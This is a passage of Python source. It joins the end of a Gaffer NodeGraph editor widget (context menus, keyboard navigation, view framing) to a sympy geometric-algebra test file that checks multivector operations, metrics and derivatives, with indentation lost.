gadgets = viewport.gadgetsAt( IECore.V2f( event.line.p1.x, event.line.p1.y ) )
if len( gadgets ) :
overrideMenuDefinition = IECore.MenuDefinition()
overrideMenuTitle = None
if isinstance( gadgets[0], GafferUI.Nodule ) :
self.plugContextMenuSignal()( self, gadgets[0].plug(), overrideMenuDefinition )
overrideMenuTitle = gadgets[0].plug().relativeName( self.graphGadget().getRoot() )
elif isinstance( gadgets[0], GafferUI.ConnectionGadget ) :
self.connectionContextMenuSignal()( self, gadgets[0].dstNodule().plug(), overrideMenuDefinition )
overrideMenuTitle = "-> " + gadgets[0].dstNodule().plug().relativeName( self.graphGadget().getRoot() )
else :
nodeGadget = gadgets[0]
if not isinstance( nodeGadget, GafferUI.NodeGadget ) :
nodeGadget = nodeGadget.ancestor( GafferUI.NodeGadget.staticTypeId() )
if nodeGadget is not None :
self.nodeContextMenuSignal()( self, nodeGadget.node(), overrideMenuDefinition )
overrideMenuTitle = nodeGadget.node().getName()
if len( overrideMenuDefinition.items() ) :
menuDefinition = overrideMenuDefinition
self._m = GafferUI.Menu( menuDefinition, title=overrideMenuTitle )
self._m.popup( self )
return True
self._nodeMenu().popup( self )
return True
return False
def __nodeGadgetAt( self, position ) :
viewport = self.__gadgetWidget.getViewportGadget()
line = viewport.rasterToGadgetSpace( IECore.V2f( position.x, position.y ) )
return self.graphGadget().nodeGadgetAt( line )
def __keyPress( self, widget, event ) :
if event.key == "F" :
self.__frame( self.scriptNode().selection() )
return True
## \todo This cursor key navigation might not make sense for all applications,
# so we should move it into BoxUI and load it in a config file that the gui app uses.
# I think this implies that every Widget.*Signal() method should have a
# Widget.static*Signal() method to allow global handlers to be registered by widget type.
# We already have a mix of static/nonstatic signals for menus, so that might make a nice
# generalisation.
elif event.key == "Down" :
selection = self.scriptNode().selection()
if selection.size() and isinstance( selection[0], Gaffer.Box ) :
self.graphGadget().setRoot( selection[0] )
return True
elif event.key == "Up" :
root = self.graphGadget().getRoot()
if isinstance( root, Gaffer.Box ) :
self.graphGadget().setRoot( root.parent() )
return True
elif event.key == "Tab" :
self._nodeMenu().popup( self )
return True
return False
def __frame( self, nodes, extend = False ) :
graphGadget = self.graphGadget()
# get the bounds of the nodes
bound = IECore.Box3f()
for node in nodes :
nodeGadget = graphGadget.nodeGadget( node )
if nodeGadget :
bound.extendBy( nodeGadget.transformedBound( graphGadget ) )
# if there were no nodes then use the bound of the whole
# graph.
if bound.isEmpty() :
bound = graphGadget.bound()
# if there's still nothing then an arbitrary area in the centre of the world
if bound.isEmpty() :
bound = IECore.Box3f( IECore.V3f( -10, -10, 0 ), IECore.V3f( 10, 10, 0 ) )
# pad it a little bit so
# it sits nicer in the frame
bound.min -= IECore.V3f( 1, 1, 0 )
bound.max += IECore.V3f( 1, 1, 0 )
if extend :
# we're extending the existing framing, which we assume the
# user was happy with other than it not showing the nodes in question.
# so we just take the union of the existing frame and the one for the nodes.
cb = self.__currentFrame()
bound.extendBy( IECore.Box3f( IECore.V3f( cb.min.x, cb.min.y, 0 ), IECore.V3f( cb.max.x, cb.max.y, 0 ) ) )
else :
# we're reframing from scratch, so the frame for the nodes is all we need.
# we do however want to make sure that we don't zoom in too far if the node
# bounds are small, as having a single node filling the screen is of little use -
# it's better to see some context around it.
boundSize = bound.size()
widgetSize = IECore.V3f( self._qtWidget().width(), self._qtWidget().height(), 0 )
pixelsPerUnit = widgetSize / boundSize
adjustedPixelsPerUnit = min( pixelsPerUnit.x, pixelsPerUnit.y, 10 )
newBoundSize = widgetSize / adjustedPixelsPerUnit
boundCenter = bound.center()
bound.min = boundCenter - newBoundSize / 2.0
bound.max = boundCenter + newBoundSize / 2.0
self.__gadgetWidget.getViewportGadget().frame( bound )
def __buttonDoubleClick( self, widget, event ) :
nodeGadget = self.__nodeGadgetAt( event.line.p1 )
if nodeGadget is not None :
return self.nodeDoubleClickSignal()( self, nodeGadget.node() )
def __dragEnter( self, widget, event ) :
if event.sourceWidget is self.__gadgetWidget :
return False
if self.__dropNodes( event.data ) :
return True
return False
def __drop( self, widget, event ) :
if event.sourceWidget is self.__gadgetWidget :
return False
self.__frame( self.__dropNodes( event.data ) )
return True
def __dropNodes( self, dragData ) :
if isinstance( dragData, Gaffer.Node ) :
return [ dragData ]
elif isinstance( dragData, Gaffer.Plug ) :
return [ dragData.node() ]
elif isinstance( dragData, Gaffer.Set ) :
return [ x for x in dragData if isinstance( x, Gaffer.Node ) ]
return []
def __currentFrame( self ) :
camera = self.graphGadgetWidget().getViewportGadget().getCamera()
frame = camera.parameters()["screenWindow"].value
translation = camera.getTransform().matrix.translation()
frame.min += IECore.V2f( translation.x, translation.y )
frame.max += IECore.V2f( translation.x, translation.y )
return frame
def __rootChanged( self, graphGadget, previousRoot ) :
# save/restore the current framing so jumping in
# and out of Boxes isn't a confusing experience.
def __framePlug( node, createIfMissing = False ) :
plugName = "__nodeGraphFraming%d" % id( self )
result = node.getChild( plugName )
if result is None and createIfMissing :
result = Gaffer.Box2fPlug( plugName, flags = Gaffer.Plug.Flags.Default & ( ~Gaffer.Plug.Flags.Serialisable ) )
node.addChild( result )
return result
__framePlug( previousRoot, True ).setValue( self.__currentFrame() )
newFramePlug = __framePlug( self.graphGadget().getRoot() )
if newFramePlug is not None :
frame = newFramePlug.getValue()
self.graphGadgetWidget().getViewportGadget().frame(
IECore.Box3f( IECore.V3f( frame.min.x, frame.min.y, 0 ), IECore.V3f( frame.max.x, frame.max.y, 0 ) )
)
else :
self.__frame( self.graphGadget().getRoot().children( Gaffer.Node.staticTypeId() ) )
# do what we need to do to keep our title up to date.
if graphGadget.getRoot().isSame( self.scriptNode() ) :
self.__rootNameChangedConnection = None
self.__rootParentChangedConnection = None
else :
self.__rootNameChangedConnection = graphGadget.getRoot().nameChangedSignal().connect( Gaffer.WeakMethod( self.__rootNameChanged ) )
self.__rootParentChangedConnection = graphGadget.getRoot().parentChangedSignal().connect( Gaffer.WeakMethod( self.__rootParentChanged ) )
self.titleChangedSignal()( self )
def __rootNameChanged( self, root ) :
self.titleChangedSignal()( self )
def __rootParentChanged( self, root, oldParent ) :
# root has been deleted
## \todo I'm not sure if we should be responsible for removing ourselves or not.
# Perhaps we should just signal that we're not valid in some way and the CompoundEditor should
# remove us? Consider how this relates to NodeEditor.__deleteWindow() too.
self.parent().removeChild( self )
@classmethod
def __getNodeInputConnectionsVisible( cls, graphGadget, node ) :
return not graphGadget.getNodeInputConnectionsMinimised( node )
@classmethod
def __setNodeInputConnectionsVisible( cls, graphGadget, node, value ) :
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
graphGadget.setNodeInputConnectionsMinimised( node, not value )
@classmethod
def __getNodeOutputConnectionsVisible( cls, graphGadget, node ) :
return not graphGadget.getNodeOutputConnectionsMinimised( node )
@classmethod
def __setNodeOutputConnectionsVisible( cls, graphGadget, node, value ) :
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
graphGadget.setNodeOutputConnectionsMinimised( node, not value )
@classmethod
def __setEnabled( cls, node, value ) :
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
node.enabledPlug().setValue( value )
GafferUI.EditorWidget.registerType( "NodeGraph", NodeGraph )
| |
# sympy/galgebra/tests/test_ga.py
"""
The reference D&L is "Geometric Algebra for Physicists" by Doran and Lasenby
"""
from sympy.core import expand, Rational, S, Symbol, symbols
from sympy.functions import sin, cos
from sympy.galgebra.ga import MV, Nga, Com
from sympy.galgebra.printing import GA_Printer
from sympy.matrices import Matrix
from sympy.simplify import collect, simplify
from sympy.utilities.pytest import XFAIL
def F(x, n, nbar):
"""
Conformal Mapping Function from 3D Euclidean space to 5D conformal space
where the images of all maps are null vectors.
"""
return Rational(1, 2)*((x*x)*n + 2*x - nbar)
def make_vector(a, m=3):
global n, nbar
if isinstance(a, str):
sym_str = ''
for i in range(m):
sym_str += a + str(i + 1) + ' '
sym_lst = list(symbols(sym_str))
sym_lst.append(S.Zero)
sym_lst.append(S.Zero)
a = MV(sym_lst, 'vector')
return F(a, n, nbar)
def test_rmul():
"""
Test for commutative scalar multiplication. Leftover from when sympy and
numpy were not working together and __mul__ and __rmul__ would not give the
same answer.
"""
x, y, z = MV.setup('x y z')
a, b, c = symbols('a b c')
assert 5*x == x*5
assert Rational(1, 2)*x == x*Rational(1, 2)
assert a*x == x*a
def test_contraction():
"""
Test for inner product and left and right contraction
"""
e_1, e_2, e_3 = MV.setup('e_1 e_2 e_3', '1 0 0, 0 1 0, 0 0 1')
assert ((e_1 ^ e_3) | e_1) == -e_3
assert ((e_1 ^ e_3) > e_1) == -e_3
assert (e_1 | (e_1 ^ e_3)) == e_3
assert (e_1 < (e_1 ^ e_3)) == e_3
assert ((e_1 ^ e_3) < e_1) == 0
assert (e_1 > (e_1 ^ e_3)) == 0
def test_substitution():
e_x, e_y, e_z = MV.setup('e_x e_y e_z', '1 0 0, 0 1 0, 0 0 1')
x, y, z = symbols('x y z')
X = x*e_x + y*e_y + z*e_z
Y = X.subs([(x, 2), (y, 3), (z, 4)])
assert Y == 2*e_x + 3*e_y + 4*e_z
def test_vector_extraction():
"""
Show that conformal bivector encodes two points. See D&L Section 10.4.1
"""
metric = ' 0 -1 #,' + \
'-1 0 #,' + \
' # # #,'
P1, P2, a = MV.setup('P1 P2 a', metric)
"""
P1 and P2 are null vectors and hence encode points in conformal space.
Show that P1 and P2 can be extracted from the bivector B = P1^P2. a is a
third vector in the conformal space with a.B not 0.
"""
B = P1 ^ P2
Bsq = B*B
ap = a - (a ^ B)*B
Ap = ap + ap*B
Am = ap - ap*B
P1dota = Symbol('(P1.a)')
P2dota = Symbol('(P2.a)')
Ap_test = (-2*P2dota)*P1
Am_test = (-2*P1dota)*P2
assert Ap == Ap_test
assert Am == Am_test
Ap2 = Ap*Ap
Am2 = Am*Am
assert Ap2 == S.Zero
assert Am2 == S.Zero
def test_metrics():
"""
Test specific metrics (diagpq, arbitrary_metric, arbitrary_metric_conformal)
"""
from sympy.galgebra.ga import diagpq, arbitrary_metric, arbitrary_metric_conformal
metric = diagpq(3)
p1, p2, p3 = MV.setup('p1 p2 p3', metric, debug=0)
x1, y1, z1 = symbols('x1 y1 z1')
x2, y2, z2 = symbols('x2 y2 z2')
v1 = x1*p1 + y1*p2 + z1*p3
v2 = x2*p1 + y2*p2 + z2*p3
prod1 = v1*v2
prod2 = (v1|v2) + (v1^v2)
diff = prod1 - prod2
assert diff == MV(S.Zero)
metric = arbitrary_metric(3)
p1, p2, p3 = MV.setup('p1 p2 p3', metric, debug=0)
v1 = x1*p1 + y1*p2 + z1*p3
v2 = x2*p1 + y2*p2 + z2*p3
prod1 = v1*v2
prod2 = (v1|v2) + (v1^v2)
diff = prod1 - prod2
assert diff == MV(S.Zero)
@XFAIL
def test_metrics_xfail():
from sympy.galgebra.ga import arbitrary_metric_conformal
metric = arbitrary_metric_conformal(3)
p1, p2, p3 = MV.setup('p1 p2 p3', metric, debug=0)
v1 = x1*p1 + y1*p2 + z1*p3
v2 = x2*p1 + y2*p2 + z2*p3
prod1 = v1*v2
prod2 = (v1|v2) + (v1^v2)
diff = prod1 - prod2
assert diff == MV(S.Zero)
def test_geometry():
"""
Test conformal geometric description of circles, lines, spheres, and planes.
"""
metric = '1 0 0 0 0,' + \
'0 1 0 0 0,' + \
'0 0 1 0 0,' + \
'0 0 0 0 2,' + \
'0 0 0 2 0'
e0, e1, e2, n, nbar = MV.setup('e0 e1 e2 n nbar', metric, debug=0)
e = n + nbar
#conformal representation of points
A = F(e0, n, nbar) # point a = (1,0,0) A = F(a)
B = F(e1, n, nbar) # point b = (0,1,0) B = F(b)
C = F(-1*e0, n, nbar) # point c = (-1,0,0) C = F(c)
D = F(e2, n, nbar) # point d = (0,0,1) D = F(d)
x0, x1, x2 = symbols('x0 x1 x2')
X = F(MV([x0, x1, x2], 'vector'), n, nbar)
Circle = A ^ B ^ C ^ X
Line = A ^ B ^ n ^ X
Sphere = A ^ B ^ C ^ D ^ X
Plane = A ^ B ^ n ^ D ^ X
#Circle through a, b, and c
Circle_test = -x2*(e0 ^ e1 ^ e2 ^ n) + x2*(
e0 ^ e1 ^ e2 ^ nbar) + Rational(1, 2)*(-1 + x0**2 + x1**2 + x2**2)*(e0 ^ e1 ^ n ^ nbar)
diff = Circle - Circle_test
assert diff == S.Zero
#Line through a and b
Line_test = -x2*(e0 ^ e1 ^ e2 ^ n) + \
Rational(1, 2)*(-1 + x0 + x1)*(e0 ^ e1 ^ n ^ nbar) + \
(Rational(1, 2)*x2)*(e0 ^ e2 ^ n ^ nbar) + \
(-Rational(1, 2)*x2)*(e1 ^ e2 ^ n ^ nbar)
diff = Line - Line_test
assert diff == S.Zero
#Sphere through a, b, c, and d
Sphere_test = Rational(1, 2)*(1 - x0**2 - x1**2 - x2**2)*(e0 ^ e1 ^ e2 ^ n ^ nbar)
diff = Sphere - Sphere_test
assert diff == S.Zero
#Plane through a, b, and d
Plane_test = Rational(1, 2)*(1 - x0 - x1 - x2)*(e0 ^ e1 ^ e2 ^ n ^ nbar)
diff = Plane - Plane_test
assert diff == S.Zero
def test_extract_plane_and_line():
"""
Show that conformal trivector encodes planes and lines. See D&L section
10.4.2
"""
metric = '# # # 0 0,' + \
'# # # 0 0,' + \
'# # # 0 0,' + \
'0 0 0 0 2,' + \
'0 0 0 2 0'
p1, p2, p3, n, nbar = MV.setup('p1 p2 p3 n nbar', metric, debug=0)
P1 = F(p1, n, nbar)
P2 = F(p2, n, nbar)
P3 = F(p3, n, nbar)
#Line through p1 and p2
L = P1 ^ P2 ^ n
delta = (L | n) | nbar
delta_test = 2*p1 - 2*p2
diff = delta - delta_test
assert diff == S.Zero
#Plane through p1, p2, and p3
C = P1 ^ P2 ^ P3
delta = ((C ^ n) | n) | nbar
delta_test = 2*(p1 ^ p2) - 2*(p1 ^ p3) + 2*(p2 ^ p3)
diff = delta - delta_test
assert diff == S.Zero
@XFAIL
def test_reciprocal_frame():
"""
Test of formula for general reciprocal frame of three vectors.
Let three independent vectors be e1, e2, and e3. The reciprocal
vectors E1, E2, and E3 obey the relations:
e_i.E_j = delta_ij*(e1^e2^e3)**2
"""
metric = '1 # #,' + \
'# 1 #,' + \
'# # 1,'
e1, e2, e3 = MV.setup('e1 e2 e3', metric)
E = e1 ^ e2 ^ e3
Esq = (E*E)()
Esq_inv = 1/Esq
E1 = (e2 ^ e3)*E
E2 = (-1)*(e1 ^ e3)*E
E3 = (e1 ^ e2)*E
w = (E1 | e2)
w.collect(MV.g)
w = w().expand()
w = (E1 | e3)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E2 | e1)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E2 | e3)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E3 | e1)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E3 | e2)
w.collect(MV.g)
w = w().expand()
assert w == 0
w = (E1 | e1)
w = w().expand()
Esq = Esq.expand()
assert w/Esq == 1
w = (E2 | e2)
w = w().expand()
assert w/Esq == 1
w = (E3 | e3)
w = w().expand()
assert w/Esq == 1
@XFAIL
def test_derivative():
coords = x, y, z = symbols('x y z')
e_x, e_y, e_z, _ = MV.setup('e', '1 0 0, 0 1 0, 0 0 1', coords=coords)
X = x*e_x + y*e_y + z*e_z
a = MV('a', 'vector')
assert ((X | a).grad()) == a
assert ((X*X).grad()) == 2*X
assert (X*X*X).grad() == 5*X*X
assert X.grad_int() == 3
@XFAIL
def test_str():
e_1, e_2, e_3 = MV.setup('e_1 e_2 e_3', '1 0 0, 0 1 0, 0 0 1')
X = MV('x')
assert str(X) == 'x + x__1*e_1 + x__2*e_2 + x__3*e_3 + x__12*e_1^e_2 + x__13*e_1^e_3 + x__23*e_2^e_3 + x__123**e_1^e_2^e_3'
Y = MV('y', 'spinor')
assert str(Y) == 'y + y__12*e_1^e_2 + y__13*e_1^e_3 + y__23*e_2^e_3'
Z = X + Y
assert str(Z) == 'x + y + x__1*e_1 + x__2*e_2 + x__3*e_3 + (x__12 + y__12)*e_1^e_2 + (x__13 + y__13)*e_1^e_3 + (x__23 + y__23)*e_2^e_3 + x__123*e_1^e_2^e_3'
assert str(e_1 | e_1) == '1'
@XFAIL
def test_metric():
MV.setup('e_1 e_2 e_3', '[1,1,1]')
assert MV.metric == Matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
@XFAIL
def test_constructor():
"""
Test various multivector constructors
"""
e_1, e_2, e_3 = MV.setup('e_1 e_2 e_3', '[1,1,1]')
assert str(MV('a', 'scalar')) == 'a'
assert str(MV('a', 'vector')) == 'a__1*e_1 + a__2*e_2 + a__3*e_3'
assert str(MV('a', 'pseudo')) == 'a__123*e_1^e_2^e_3'
assert str(MV('a', 'spinor')) == 'a + a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3'
assert str(MV('a')) == 'a + a__1*e_1 + a__2*e_2 + a__3*e_3 + a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3 + a__123*e_1^e_2^e_3'
assert str(MV([2, 'a'], 'grade')) == 'a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3'
assert str(MV('a', 'grade2')) == 'a__12*e_1^e_2 + a__13*e_1^e_3 + a__23*e_2^e_3'
def test_basic_multivector_operations():
with GA_Printer():
(ex, ey, ez) = MV.setup('e*x|y|z')
A = MV('A', 'mv')
assert str(A) == 'A + A__x*e_x + A__y*e_y + A__z*e_z + A__xy*e_x^e_y + A__xz*e_x^e_z + A__yz*e_y^e_z + A__xyz*e_x^e_y^e_z'
assert str(A) == 'A + A__x*e_x + A__y*e_y + A__z*e_z + A__xy*e_x^e_y + A__xz*e_x^e_z + A__yz*e_y^e_z + A__xyz*e_x^e_y^e_z'
assert str(A) == 'A + A__x*e_x + A__y*e_y + A__z*e_z + A__xy*e_x^e_y + A__xz*e_x^e_z + A__yz*e_y^e_z + A__xyz*e_x^e_y^e_z'
X = MV('X', 'vector')
Y = MV('Y', 'vector')
assert str(X) == 'X__x*e_x + X__y*e_y + X__z*e_z'
assert str(Y) == 'Y__x*e_x + Y__y*e_y + Y__z*e_z'
assert str((X*Y)) == '(e_x.e_x)*X__x*Y__x + (e_x.e_y)*X__x*Y__y + (e_x.e_y)*X__y*Y__x + (e_x.e_z)*X__x*Y__z + (e_x.e_z)*X__z*Y__x + (e_y.e_y)*X__y*Y__y + (e_y.e_z)*X__y*Y__z + (e_y.e_z)*X__z*Y__y + (e_z.e_z)*X__z*Y__z + (X__x*Y__y - X__y*Y__x)*e_x^e_y + (X__x*Y__z - X__z*Y__x)*e_x^e_z + (X__y*Y__z - X__z*Y__y)*e_y^e_z'
assert str((X ^ Y)) == '(X__x*Y__y - X__y*Y__x)*e_x^e_y + (X__x*Y__z - X__z*Y__x)*e_x^e_z + (X__y*Y__z - X__z*Y__y)*e_y^e_z'
assert str((X | Y)) == '(e_x.e_x)*X__x*Y__x + (e_x.e_y)*X__x*Y__y + (e_x.e_y)*X__y*Y__x + (e_x.e_z)*X__x*Y__z + (e_x.e_z)*X__z*Y__x + (e_y.e_y)*X__y*Y__y + (e_y.e_z)*X__y*Y__z + (e_y.e_z)*X__z*Y__y + (e_z.e_z)*X__z*Y__z'
(ex, ey) = MV.setup('e*x|y')
X = MV('X', 'vector')
A = MV('A', 'spinor')
assert str(X) == 'X__x*e_x + X__y*e_y'
assert str(A) == 'A + A__xy*e_x^e_y'
assert str((X | A)) == '(-A__xy*((e_x.e_y)*X__x + (e_y.e_y)*X__y))*e_x + (A__xy*((e_x.e_x)*X__x + (e_x.e_y)*X__y))*e_y'
assert str((X < A)) == '(-A__xy*((e_x.e_y)*X__x + (e_y.e_y)*X__y))*e_x + (A__xy*((e_x.e_x)*X__x + (e_x.e_y)*X__y))*e_y'
assert str((A > X)) == '(A__xy*((e_x.e_y)*X__x + (e_y.e_y)*X__y))*e_x + (-A__xy*((e_x.e_x)*X__x + (e_x.e_y)*X__y))*e_y'
(ex, ey) = MV.setup('e*x|y', metric='[1,1]')
X = MV('X', 'vector')
A = MV('A', 'spinor')
assert str(X) == 'X__x*e_x + X__y*e_y'
assert str(A) == 'A + A__xy*e_x^e_y'
assert str((X*A)) == '(A*X__x - A__xy*X__y)*e_x + (A*X__y + A__xy*X__x)*e_y'
assert str((X | A)) == '-A__xy*X__y*e_x + A__xy*X__x*e_y'
assert str((X < A)) == '-A__xy*X__y*e_x + A__xy*X__x*e_y'
assert str((X > A)) == 'A*X__x*e_x + A*X__y*e_y'
assert str((A*X)) == '(A*X__x + A__xy*X__y)*e_x + (A*X__y - A__xy*X__x)*e_y'
assert str((A | X)) == 'A__xy*X__y*e_x - A__xy*X__x*e_y'
assert str((A < X)) == 'A*X__x*e_x + A*X__y*e_y'
assert str((A > X)) == 'A__xy*X__y*e_x - A__xy*X__x*e_y'
return
def test_check_generalized_BAC_CAB_formulas():
with GA_Printer():
(a, b, c, d, e) = MV.setup('a b c d e')
assert str(a | (b*c)) == '-(a.c)*b + (a.b)*c'
assert str(a | (b ^ c)) == '-(a.c)*b + (a.b)*c'
assert str(a | (b ^ c ^ d)) == '(a.d)*b^c - (a.c)*b^d + (a.b)*c^d'
assert str((a | (b ^ c)) + (c | (a ^ b)) + (b | (c ^ a))) == '0'
assert str(a*(b ^ c) - b*(a ^ c) + c*(a ^ b)) == '3*a^b^c'
assert str(a*(b ^ c ^ d) - b*(a ^ c ^ d) + c*(a ^ b ^ d) - d*(a ^ b ^ c)) == '4*a^b^c^d'
assert str((a ^ b) | (c ^ d)) == '-(a.c)*(b.d) + (a.d)*(b.c)'
assert str(((a ^ b) | c) | d) == '-(a.c)*(b.d) + (a.d)*(b.c)'
assert str(Com(a ^ b, c ^ d)) == '-(b.d)*a^c + (b.c)*a^d + (a.d)*b^c - (a.c)*b^d'
assert str((a | (b ^ c)) | (d ^ e)) == '(-(a.b)*(c.e) + (a.c)*(b.e))*d + ((a.b)*(c.d) - (a.c)*(b.d))*e'
return
def test_derivatives_in_rectangular_coordinates():
with GA_Printer():
X = (x, y, z) = symbols('x y z')
(ex, ey, ez, grad) = MV.setup('e_x e_y e_z', metric='[1,1,1]', coords=X)
f = MV('f', 'scalar', fct=True)
A = MV('A', 'vector', fct=True)
B = MV('B', 'grade2', fct=True)
C = MV('C', 'mv', fct=True)
assert str(f) == 'f'
assert str(A) == 'A__x*e_x + A__y*e_y + A__z*e_z'
assert str(B) == 'B__xy*e_x^e_y + B__xz*e_x^e_z + B__yz*e_y^e_z'
assert str(C) == 'C + C__x*e_x + C__y*e_y + C__z*e_z + C__xy*e_x^e_y + C__xz*e_x^e_z + C__yz*e_y^e_z + C__xyz*e_x^e_y^e_z'
assert str(grad*f) == 'D{x}f*e_x + D{y}f*e_y + D{z}f*e_z'
assert str(grad | A) == 'D{x}A__x + D{y}A__y + D{z}A__z'
assert str(grad*A) == 'D{x}A__x + D{y}A__y + D{z}A__z + (-D{y}A__x + D{x}A__y)*e_x^e_y + (-D{z}A__x + D{x}A__z)*e_x^e_z + (-D{z}A__y + D{y}A__z)*e_y^e_z'
assert str(-MV.I*(grad ^ A)) == '(-D{z}A__y + D{y}A__z)*e_x + (D{z}A__x - D{x}A__z)*e_y + (-D{y}A__x + D{x}A__y)*e_z'
assert str(grad*B) == '(-(D{y}B__xy + D{z}B__xz))*e_x + (D{x}B__xy - D{z}B__yz)*e_y + (D{x}B__xz + D{y}B__yz)*e_z + (D{z}B__xy - D{y}B__xz + D{x}B__yz)*e_x^e_y^e_z'
assert str(grad ^ B) == '(D{z}B__xy - D{y}B__xz + D{x}B__yz)*e_x^e_y^e_z'
assert str(grad | B) == '(-(D{y}B__xy + D{z}B__xz))*e_x + (D{x}B__xy - D{z}B__yz)*e_y + (D{x}B__xz + D{y}B__yz)*e_z'
assert str(grad < A) == 'D{x}A__x + D{y}A__y + D{z}A__z'
assert str(grad > A) == 'D{x}A__x + D{y}A__y + D{z}A__z'
assert str(grad < B) == '(-(D{y}B__xy + D{z}B__xz))*e_x + (D{x}B__xy - D{z}B__yz)*e_y + (D{x}B__xz + D{y}B__yz)*e_z'
assert str(grad > B) == '0'
assert str(grad < C) == 'D{x}C__x + D{y}C__y + D{z}C__z + (-(D{y}C__xy + D{z}C__xz))*e_x + (D{x}C__xy - D{z}C__yz)*e_y + (D{x}C__xz + D{y}C__yz)*e_z + D{z}C__xyz*e_x^e_y - D{y}C__xyz*e_x^e_z + D{x}C__xyz*e_y^e_z'
assert str(grad > C) == 'D{x}C__x + D{y}C__y + D{z}C__z + D{x}C*e_x + D{y}C*e_y + D{z}C*e_z'
return
def test_derivatives_in_spherical_coordinates():
with GA_Printer():
X = (r, th, phi) = symbols('r theta phi')
curv = [[r*cos(phi)*sin(th), r*sin(phi)*sin(th), r*cos(th)], [1, r, r*sin(th)]]
(er, eth, ephi, grad) = MV.setup('e_r e_theta e_phi', metric='[1,1,1]', coords=X, curv=curv)
f = MV('f', 'scalar', fct=True)
A = MV('A', 'vector', fct=True)
B = MV('B', 'grade2', fct=True)
assert str(f) == 'f'
assert str(A) == 'A__r*e_r + A__theta*e_theta + A__phi*e_phi'
assert str(B) == 'B__rtheta*e_r^e_theta + B__rphi*e_r^e_phi + B__thetaphi*e_theta^e_phi'
assert str(grad*f) == 'D{r}f*e_r + D{theta}f/r*e_theta + D{phi}f/(r*sin(theta))*e_phi'
assert str(grad | A) == 'D{r}A__r + 2*A__r/r + A__theta*cos(theta)/(r*sin(theta)) + D{theta}A__theta/r + D{phi}A__phi/(r*sin(theta))'
assert str(-MV.I*(grad ^ A)) == '((A__phi*cos(theta)/sin(theta) + D{theta}A__phi - D{phi}A__theta/sin(theta))/r)*e_r + (-D{r}A__phi - A__phi/r + D{phi}A__r/(r*sin(theta)))*e_theta + (D{r}A__theta + A__theta/r - D{theta}A__r/r)*e_phi'
assert str(grad ^ B) == '(D{r}B__thetaphi - B__rphi*cos(theta)/(r*sin(theta)) + 2*B__thetaphi/r - D{theta}B__rphi/r + D{phi}B__rtheta/(r*sin(theta)))*e_r^e_theta^e_phi'
return
def test_rounding_numerical_components():
with GA_Printer():
(ex, ey, ez) = MV.setup('e_x e_y e_z', metric='[1,1,1]')
X = 1.2*ex + 2.34*ey + 0.555*ez
Y = 0.333*ex + 4*ey + 5.3*ez
assert str(X) == '1.20000000000000*e_x + 2.34000000000000*e_y + 0.555000000000000*e_z'
assert str(Nga(X, 2)) == '1.2*e_x + 2.3*e_y + 0.55*e_z'
assert str(X*Y) == '12.7011000000000 + 4.02078000000000*e_x^e_y + 6.17518500000000*e_x^e_z + 10.1820000000000*e_y^e_z'
assert str(Nga(X*Y, 2)) == '13. + 4.0*e_x^e_y + 6.2*e_x^e_z + 10.*e_y^e_z'
return
def test_noneuclidian_distance_calculation():
from sympy import solve, sqrt
with GA_Printer():
metric = '0 # #,# 0 #,# # 1'
(X, Y, e) = MV.setup('X Y e', metric)
assert str((X ^ Y)*(X ^ Y)) == '(X.Y)**2'
L = X ^ Y ^ e
B = L*e
assert str(B) == 'X^Y - (Y.e)*X^e + (X.e)*Y^e'
Bsq = B*B
assert str(Bsq) == '(X.Y)*((X.Y) - 2*(X.e)*(Y.e))'
Bsq = Bsq.scalar()
assert str(B) == 'X^Y - (Y.e)*X^e + (X.e)*Y^e'
BeBr = B*e*B.rev()
assert str(BeBr) == '((X.Y)*(-(X.Y) + 2*(X.e)*(Y.e)))*e'
assert str(B*B) == '(X.Y)*((X.Y) - 2*(X.e)*(Y.e))'
assert str(L*L) == '(X.Y)*((X.Y) - 2*(X.e)*(Y.e))'
(s, c, Binv, M, BigS, BigC, alpha, XdotY, Xdote, Ydote) = symbols('s c (1/B) M S C alpha (X.Y) (X.e) (Y.e)')
Bhat = Binv*B
R = c + s*Bhat
assert str(R) == 'c + (1/B)*s*X^Y - (1/B)*(Y.e)*s*X^e + (1/B)*(X.e)*s*Y^e'
Z = R*X*R.rev()
Z.obj = expand(Z.obj)
Z.obj = Z.obj.collect([Binv, s, c, XdotY])
assert str(Z) == '((1/B)**2*(X.Y)**2*s**2 - 2*(1/B)**2*(X.Y)*(X.e)*(Y.e)*s**2 + 2*(1/B)*(X.Y)*c*s - 2*(1/B)*(X.e)*(Y.e)*c*s + c**2)*X + 2*(1/B)*(X.e)**2*c*s*Y + (2*(1/B)*(X.Y)*(X.e)*s*(-(1/B)*(X.Y)*s + 2*(1/B)*(X.e)*(Y.e)*s - c))*e'
W = Z | Y
# From this point forward all calculations are with sympy scalars
W = W.scalar()
assert str(W) == '(1/B)**2*(X.Y)**3*s**2 - 4*(1/B)**2*(X.Y)**2*(X.e)*(Y.e)*s**2 + 4*(1/B)**2*(X.Y)*(X.e)**2*(Y.e)**2*s**2 + 2*(1/B)*(X.Y)**2*c*s - 4*(1/B)*(X.Y)*(X.e)*(Y.e)*c*s + (X.Y)*c**2'
W = expand(W)
W = simplify(W)
W = W.collect([s*Binv])
M = 1/Bsq
W = W.subs(Binv**2, M)
W = simplify(W)
Bmag = sqrt(XdotY**2 - 2*XdotY*Xdote*Ydote)
W = W.collect([Binv*c*s, XdotY])
#Double angle substitutions
W = W.subs(2*XdotY**2 - 4*XdotY*Xdote*Ydote, 2/(Binv**2))
W = W.subs(2*c*s, BigS)
W = W.subs(c**2, (BigC + 1)/2)
W = W.subs(s**2, (BigC - 1)/2)
W = simplify(W)
W = expand(W)
W = W.subs(1/Binv, Bmag)
assert str(W) == '(X.Y)*C - (X.e)*(Y.e)*C + (X.e)*(Y.e) + S*sqrt((X.Y)**2 - 2*(X.Y)*(X.e)*(Y.e))'
Wd = collect(W, [BigC, BigS], exact=True, evaluate=False)
